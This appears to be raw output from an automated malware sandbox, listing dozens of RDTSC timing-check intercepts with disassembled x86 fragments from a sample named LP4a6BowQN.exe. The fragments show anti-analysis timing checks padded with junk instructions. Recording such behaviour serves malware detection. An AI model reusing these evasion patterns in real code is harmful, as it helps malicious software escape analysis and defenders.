                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AB02E1 second address: 4AB035D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC8BCFEEF0Bh 0x00000008 sub si, 9A2Eh 0x0000000d jmp 00007FC8BCFEEF19h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov esi, 5CCE9CB7h 0x0000001a popad 0x0000001b push eax 0x0000001c pushad 0x0000001d jmp 00007FC8BCFEEF13h 0x00000022 pushfd 0x00000023 jmp 00007FC8BCFEEF18h 0x00000028 and ax, EA08h 0x0000002d jmp 00007FC8BCFEEF0Bh 0x00000032 popfd 0x00000033 popad 0x00000034 xchg eax, ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AB035D second address: 4AB0361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AB0361 second address: 4AB037C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AB037C second address: 4AB03B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 pushfd 0x00000006 jmp 00007FC8BCD0701Bh 0x0000000b xor esi, 2F6E6FAEh 0x00000011 jmp 00007FC8BCD07029h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AB03B8 second address: 4AB03BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AB03BE second address: 4AB03DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD07022h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AB03DD second address: 4AB03E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AB03E1 second address: 4AB03E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AB03E7 second address: 4AB03FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ecx, dword ptr [ebp+08h] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov di, 0B2Ah 0x00000010 mov bx, AFF6h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AB041F second address: 4AB0425 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0767 second address: 4AD076D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD076D second address: 4AD0771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0771 second address: 4AD078D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ch, F8h 0x0000000e jmp 00007FC8BCFEEF0Dh 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD078D second address: 4AD07C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC8BCD07027h 0x00000009 add si, 2E6Eh 0x0000000e jmp 00007FC8BCD07029h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD07C9 second address: 4AD07E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 jmp 00007FC8BCFEEF0Ch 0x0000000e xchg eax, ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD07E5 second address: 4AD07EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD07EB second address: 4AD07FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8BCFEEF0Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD07FA second address: 4AD0831 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC8BCD07021h 0x00000012 and esi, 71B276B6h 0x00000018 jmp 00007FC8BCD07021h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0831 second address: 4AD0848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8BCFEEF13h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0848 second address: 4AD08C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 pushad 0x0000000a mov bx, 22C6h 0x0000000e pushfd 0x0000000f jmp 00007FC8BCD07027h 0x00000014 sub ax, 914Eh 0x00000019 jmp 00007FC8BCD07029h 0x0000001e popfd 0x0000001f popad 0x00000020 xchg eax, esi 0x00000021 jmp 00007FC8BCD0701Eh 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007FC8BCD0701Ch 0x00000030 jmp 00007FC8BCD07025h 0x00000035 popfd 0x00000036 movzx eax, di 0x00000039 popad 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD08C8 second address: 4AD08CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD08CE second address: 4AD08D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD08D2 second address: 4AD092B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a mov eax, 731C0AEDh 0x0000000f jmp 00007FC8BCFEEF0Ah 0x00000014 popad 0x00000015 lea eax, dword ptr [ebp-04h] 0x00000018 pushad 0x00000019 call 00007FC8BCFEEF0Eh 0x0000001e mov dx, cx 0x00000021 pop esi 0x00000022 mov edi, 2B67C482h 0x00000027 popad 0x00000028 push ecx 0x00000029 jmp 00007FC8BCFEEF16h 0x0000002e mov dword ptr [esp], eax 0x00000031 pushad 0x00000032 movzx esi, dx 0x00000035 push eax 0x00000036 push edx 0x00000037 mov ax, bx 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD092B second address: 4AD092F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD092F second address: 4AD0950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push dword ptr [ebp+08h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC8BCFEEF13h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0950 second address: 4AD096D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD07029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD096D second address: 4AD0973 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0973 second address: 4AD0977 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD099A second address: 4AD099E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD099E second address: 4AD09A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD09A4 second address: 4AD09AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD09AA second address: 4AD09AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0A3F second address: 4AD0A43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0A43 second address: 4AD0A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0A49 second address: 4AD0A78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 mov ax, 48EFh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, esi 0x0000000e jmp 00007FC8BCFEEF12h 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FC8BCFEEF0Ah 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0A78 second address: 4AD0A7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0A7C second address: 4AD0A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0A82 second address: 4AD0A88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0A88 second address: 4AD0A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0A8C second address: 4AC01A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 pushad 0x0000000a jmp 00007FC8BCD07022h 0x0000000f mov dx, cx 0x00000012 popad 0x00000013 retn 0004h 0x00000016 nop 0x00000017 cmp eax, 00000000h 0x0000001a setne al 0x0000001d jmp 00007FC8BCD07012h 0x0000001f xor ebx, ebx 0x00000021 test al, 01h 0x00000023 jne 00007FC8BCD07017h 0x00000025 sub esp, 04h 0x00000028 mov dword ptr [esp], 0000000Dh 0x0000002f call 00007FC8C0FB4795h 0x00000034 mov edi, edi 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 jmp 00007FC8BCD0701Dh 0x0000003e mov ax, 5267h 0x00000042 popad 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC01A1 second address: 4AC01A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC01A7 second address: 4AC01AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC01AB second address: 4AC01F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushfd 0x0000000e jmp 00007FC8BCFEEF0Ah 0x00000013 and ax, 6FC8h 0x00000018 jmp 00007FC8BCFEEF0Bh 0x0000001d popfd 0x0000001e popad 0x0000001f push ecx 0x00000020 mov edx, 32C60D6Ah 0x00000025 pop ebx 0x00000026 popad 0x00000027 mov dword ptr [esp], ebp 0x0000002a pushad 0x0000002b mov cl, 91h 0x0000002d mov si, bx 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FC8BCFEEF0Eh 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC01F9 second address: 4AC0234 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC8BCD07021h 0x00000009 xor eax, 7B55E246h 0x0000000f jmp 00007FC8BCD07021h 0x00000014 popfd 0x00000015 push ecx 0x00000016 pop edi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a sub esp, 2Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0234 second address: 4AC0238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0238 second address: 4AC023C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC023C second address: 4AC0242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0242 second address: 4AC028E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 mov ah, 2Eh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebp 0x0000000c pushad 0x0000000d movzx esi, dx 0x00000010 mov edx, 4EA89E2Eh 0x00000015 popad 0x00000016 mov dword ptr [esp], ebx 0x00000019 jmp 00007FC8BCD07025h 0x0000001e xchg eax, edi 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushfd 0x00000023 jmp 00007FC8BCD0701Ah 0x00000028 add al, FFFFFFA8h 0x0000002b jmp 00007FC8BCD0701Bh 0x00000030 popfd 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC028E second address: 4AC02AA instructions: 0x00000000 rdtsc 0x00000002 mov edi, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007FC8BCFEEF14h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC02AA second address: 4AC02DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FC8BCD0701Ch 0x0000000d mov si, ED11h 0x00000011 popad 0x00000012 xchg eax, edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC8BCD07026h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC02DE second address: 4AC02E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC02E4 second address: 4AC02EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC02EA second address: 4AC02EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC02EE second address: 4AC02F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC031E second address: 4AC0324 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0324 second address: 4AC0392 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, 00000000h 0x0000000d pushad 0x0000000e mov edi, ecx 0x00000010 pushfd 0x00000011 jmp 00007FC8BCD07020h 0x00000016 jmp 00007FC8BCD07025h 0x0000001b popfd 0x0000001c popad 0x0000001d inc ebx 0x0000001e pushad 0x0000001f push eax 0x00000020 pop esi 0x00000021 popad 0x00000022 test al, al 0x00000024 pushad 0x00000025 mov bh, ah 0x00000027 mov bh, C4h 0x00000029 popad 0x0000002a je 00007FC8BCD0728Eh 0x00000030 jmp 00007FC8BCD07022h 0x00000035 lea ecx, dword ptr [ebp-14h] 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FC8BCD0701Ah 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0392 second address: 4AC0396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0396 second address: 4AC039C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0417 second address: 4AC041C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC041C second address: 4AC042A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8BCD0701Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC042A second address: 4AC042E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC042E second address: 4AC0468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FC8BCD0701Eh 0x0000000e nop 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007FC8BCD0701Ch 0x00000018 sbb ecx, 39C71828h 0x0000001e jmp 00007FC8BCD0701Bh 0x00000023 popfd 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC04E2 second address: 4AC0529 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, cl 0x00000005 pushfd 0x00000006 jmp 00007FC8BCFEEF15h 0x0000000b or ecx, 1821D466h 0x00000011 jmp 00007FC8BCFEEF11h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test eax, eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC8BCFEEF0Dh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0529 second address: 4AC0560 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD07021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FC92DCA4F64h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC8BCD07028h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0560 second address: 4AC0564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0564 second address: 4AC056A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC056A second address: 4AC0571 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0571 second address: 4AC059D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 js 00007FC8BCD0707Fh 0x0000000d jmp 00007FC8BCD07024h 0x00000012 cmp dword ptr [ebp-14h], edi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov esi, edi 0x0000001a push ebx 0x0000001b pop eax 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC059D second address: 4AC05A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC05A3 second address: 4AC05A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC05A7 second address: 4AC061C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FC92DF8CDF2h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FC8BCFEEF16h 0x00000015 sbb eax, 10001D88h 0x0000001b jmp 00007FC8BCFEEF0Bh 0x00000020 popfd 0x00000021 pushad 0x00000022 push eax 0x00000023 pop ebx 0x00000024 movzx ecx, dx 0x00000027 popad 0x00000028 popad 0x00000029 mov ebx, dword ptr [ebp+08h] 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f movzx esi, bx 0x00000032 pushfd 0x00000033 jmp 00007FC8BCFEEF0Bh 0x00000038 and si, 9A7Eh 0x0000003d jmp 00007FC8BCFEEF19h 0x00000042 popfd 0x00000043 popad 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC061C second address: 4AC0651 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 call 00007FC8BCD07023h 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f lea eax, dword ptr [ebp-2Ch] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC8BCD07021h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0651 second address: 4AC0657 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0657 second address: 4AC065D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC065D second address: 4AC0661 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0661 second address: 4AC068D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007FC8BCD07022h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC8BCD0701Eh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC068D second address: 4AC06C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 44E9B414h 0x00000008 mov dl, FDh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, esi 0x0000000e jmp 00007FC8BCFEEF14h 0x00000013 nop 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC8BCFEEF17h 0x0000001b rdtsc
